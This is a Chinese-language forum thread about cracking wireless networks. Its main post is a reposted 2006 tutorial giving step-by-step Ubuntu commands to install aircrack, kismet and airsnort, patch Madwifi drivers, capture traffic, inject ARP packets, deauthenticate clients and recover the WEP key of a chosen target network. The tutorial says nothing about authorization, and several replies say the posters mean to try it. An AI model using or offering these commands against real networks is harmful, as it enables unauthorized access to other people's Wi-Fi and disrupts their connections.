破解WLAN无线网络资料［5月7日更新］

[Evaz]

这么好的帖子 收藏了
这是我注册回的第一个帖子

[yamde]

留个位以后看

[pinpaixie]

呵呵 再回来看看呵

[cs772421]

我的能连接上网络，但就是不能上网。请高手指点。

[162019444]

这个好 以前用么qt3的

一直没学会

[andyqiuqiubo]

对破解用的字典我一窍不通，哪位兄弟详细介绍下啊？用什么工具生成？该怎么做？多谢！

[curexubing]

marked

[friend.ethan]

秘笈揭露 Ubuntu破解WEP密钥一点不费劲

http://www.sina.com.cn 2006年07月06日 17:30 天极yesky

代码： 全选

sudo cp /etc/apt/sources.list /etc/apt/sources.list_backup
sudo gedit /etc/apt/sources.list

在编辑器中，用以下代码代替其它东西：

代码： 全选

## Add comments (##) in front of any line to remove it from being checked.
## Use the following sources.list at your own risk.
deb http://archive.ubuntu.com/ubuntu dapper main restricted universe multiverse
deb-src http://archive.ubuntu.com/ubuntu dapper main restricted universe multiverse
## MAJOR BUG FIX UPDATES produced after the final release
deb http://archive.ubuntu.com/ubuntu dapper-updates main restricted universe multiverse
deb-src http://archive.ubuntu.com/ubuntu dapper-updates main restricted universe multiverse
## UBUNTU SECURITY UPDATES
deb http://security.ubuntu.com/ubuntu dapper-security main restricted universe multiverse
deb-src http://security.ubuntu.com/ubuntu dapper-security main restricted universe multiverse
## BACKPORTS REPOSITORY (Unsupported. May contain illegal packages. Use at own risk.)
deb http://archive.ubuntu.com/ubuntu dapper-backports main restricted universe multiverse
deb-src http://archive.ubuntu.com/ubuntu dapper-backports main restricted universe multiverse
## PLF REPOSITORY (Unsupported. May contain illegal packages. Use at own risk.)
deb http://packages.freecontrib.org/ubuntu/plf dapper free non-free
deb-src http://packages.freecontrib.org/ubuntu/plf dapper free non-free

保存文件、退出编辑器。敲入如下命令：

代码： 全选

sudo apt-get update

现在我们可以安装后续将会用到的包了：

代码： 全选

sudo apt-get install build-essential
sudo apt-get install aircrack
sudo apt-get install kismet
sudo apt-get install airsnort
sudo apt-get install linux-source
sudo apt-get install linux-headers
sudo apt-get install sharutils

接下来你应该更新整个系统，方法是，进入系统菜单——>Administration——>Update Manager。单击“Check”，开始安装更新。然后重启系统。完成后，为Madwifi驱动打补丁。

这个地方可能会有点复杂。我的无线网卡（Linksys WPC55AG）用的是Atheros驱动，我需要对之打补丁。如果你的驱动和我的不同，你需要研究一下是否需要为驱动打补丁，是否甚至可以和 Aircrack套件协同工作。Aircrack-ng.org的论坛是一个用来测试的好地方，当然了，google search也是的。如果你的网卡也是Atheros的，我们称之为ath0，那么，在终端窗口敲入iwconfig，会出现一行字符，显示以太网控制器是Atheros Communications……

我们来打补丁。当发现硬盘旧的驱动时，会暂时让你的无线网卡无法工作。先进入/usr/src目录，下载新的驱动、删掉老驱动，然后安装新驱动，并打上补丁。你可以把以下代码拷贝粘贴到终端：

代码： 全选

sudo -i
cd /usr/src
wget http://syserr.com/stuff/madwifi-cvs-20051025.tar.gz
wget http://syserr.com/stuff/madwifi-cvs-20051025.patch
ifconfig ath0 down
rmmod ath_rate_sample wlan_wep ath_rate_onoe ath_pci wlan ath_hal
find /lib/modules -name ‘ath*’ -exec rm -v {} ;
find /lib/modules -name ‘wlan*’ -exec rm -v {} ;
tar zxvf madwifi-cvs-20051025.tar.gz
cd madwifi
patch -Np1 -i ../madwifi-cvs-20051025.patch
make && make install
modprobe ath_pci

如果你用的是Atheros驱动，接下来我们旧需要配置kismet了。如果你用的是其它驱动，就必须看你所使用的语法。首先进入Kismet配置，然后改变源代码行。

代码： 全选

sudo gedit /etc/kismet/kismet.conf

把以“source=”打头的代码行变为“source=madwifi_ag,ath0,madwifi”，重启计算机。重启后你将可以通过无线网卡访问英特网。

现在我们开始破解。打开一个终端窗口，进入监控模式，运行ksimet。

代码： 全选

sudo airmon start ath0
sudo kismet

找到你想要破解的无线网络，需要注意其ESSID和通道，然后敲Ctrl-C退出。

接下来运行airodump。

代码： 全选

sudo airodump ath0 filename channel# 1

文件名随你意，可以作为ivs文件存在你的home目录下，或者存在你运行命令的任何目录下。

从airodump 中拷贝无线网络的bssid，具体做法是选中后敲Shift+Ctrl+C。打开一个新的终端窗口，以便我们可以运行aireplay，开始注入数据包，导致数据量上升。我们想要airodump中的数据栏显示在10万到40万之间。数据包越多，aircrack就可以越快地找到WEP密钥。如果WEP密钥是128位的，我们可能需要多达100万个数据包。

代码： 全选

sudo aireplay -1 0 -e ESSID -a BSSID -h 0:1:2:3:4:5 ath0

应该把网络和无线连接联系起来。如果总是超时，你需要离无线路由器更近，或通过“sudo iwconfig ath0 rate 1M”改变接口速率。

接下来我们想开始注入数据包。

代码： 全选

sudo aireplay -3 -b BSSID -h 0:1:2:3:4:5 ath0

起初只是读取数据包，并且报告0个ARP请求、发送0个数据包。只需要等一两分钟，就会开始大量发送数据包了。如果返回文本，并报告说已经被削弱了，那么敲Ctrl+C，重新运行命令。可以通过敲入下面这条命令来加速任何事情：

代码： 全选

sudo aireplay -0 ath0 -a BSSID ath0

否则就只坐等事情慢慢进行吧。随着数据包开始被发送，Airodump中的数据栏就开始飙升。等到收到了预期数量的数据包，打开一个新的终端窗口，运行aircrack。

代码： 全选

sudo aircrack filename.ivs

一分钟后，aircrack应该返回WEP密钥。如果没有返回，那就继续回收更多的数据包。

这做起来一点都不费劲，但可以起作用。

下载Ubuntu LTS

http://down1.tech.sina.com.cn/download/ ... 8382.shtml

谢谢你的反馈！你的回复很有价值！

[guibo]

这个要学习一下 以后用得着的

[lisheng]

Mark，有空了试验一下

[shihuo]

root@shihuo-laptop:~# airmon-ng start eth2


Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID Name
1146 avahi-daemon
1147 avahi-daemon
1373 NetworkManager
1458 wpa_supplicant
1511 dhclient


Interface Chipset Driver

eth2 Unknown wl (monitor mode enabled)
我的无线网卡怎么这样的啊？

[hakie]

哇，学习了。

[honghong]

有机会来试试

[xyy_xx]

这东西很好玩，是有作用。本人网卡位5100agn

[yechao1989]

挖坟了。。。